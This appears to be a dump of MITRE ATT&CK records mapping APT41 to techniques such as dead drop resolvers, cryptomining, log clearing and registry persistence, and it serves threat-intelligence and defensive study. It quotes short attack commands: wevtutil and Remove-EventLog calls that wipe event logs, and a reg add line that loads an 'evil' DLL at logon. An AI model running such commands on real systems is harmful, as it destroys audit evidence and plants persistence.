technique_ref : attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--964a9222-6e88-4850-89cc-6fc0f10ee4c9
revoked : False
technique : Dead Drop Resolver
technique_description : Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1102.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deployed a Monero cryptocurrency mining tool in a victim’s environment.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--9ebc2d8a-a945-4b5d-805f-56e16bcc6676
revoked : False
technique : Resource Hijacking
technique_description : Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 

One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)

Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)

Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='impact')]
technique_id : T1496
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Containers']
data_sources : ['Network Traffic: Network Traffic Flow', 'File: File Creation', 'Network Traffic: Network Connection Creation', 'Sensor Health: Host Status', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) created a RAR archive of targeted files for exfiltration.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--89328749-11c5-416d-99b9-f3039afc487a
revoked : False
technique : Archive via Utility
technique_description : Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.

Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems. 

On Windows, <code>diantz</code> or <code> makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. 

Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection')]
technique_id : T1560.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a malware variant called GOODLUCK to modify the registry in order to steal credentials.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--c8475b1b-c98f-4fdc-89dd-c9b04e6fbd9c
revoked : False
technique : Modify Registry
technique_description : Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1112
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: OS API Execution', 'Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Windows Registry: Windows Registry Key Deletion', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by clearing Windows security and system events.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--4cbd1250-5e79-46c0-b38f-83bd5942f44c
revoked : False
technique : Clear Windows Event Logs
technique_description : Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

The event logs can be cleared with the following utility commands:

* <code>wevtutil cl system</code>
* <code>wevtutil cl application</code>
* <code>wevtutil cl security</code>

These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command <code>Remove-EventLog -LogName Security</code> to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1070.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Command: Command Execution', 'File: File Deletion', 'Process: OS API Execution', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) created and modified startup files for persistence.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) [APT41](https://attack.mitre.org/groups/G0096) added a registry key in <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost</code> to establish persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--6ad8e998-041f-491d-8691-4990022248e0
revoked : False
technique : Registry Run Keys / Startup Folder
technique_description : Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.

The following run keys are created by default on Windows systems:

* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>. The startup folder path for all users is <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>.

The following Registry keys can be used to set startup folder items for persistence:

* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

The following Registry keys can control automatic startup of services during boot:

* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run automatically for the currently logged-on user.

By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1547.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Command: Command Execution', 'File: File Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Creation', 'Windows Registry: Windows Registry Key Modification']
permissions_required : ['Administrator', 'User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the WMIEXEC utility to execute <code>whoami</code> commands on remote machines.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--ae12b657-a640-40c6-99b7-931ed10705de
revoked : False
technique : System Owner/User Discovery
technique_description : Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1033
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Active Directory: Active Directory Object Access', 'Process: OS API Execution', 'Command: Command Execution', 'Network Traffic: Network Traffic Content', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Windows Registry: Windows Registry Key Access', 'File: File Access', 'Process: Process Access']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
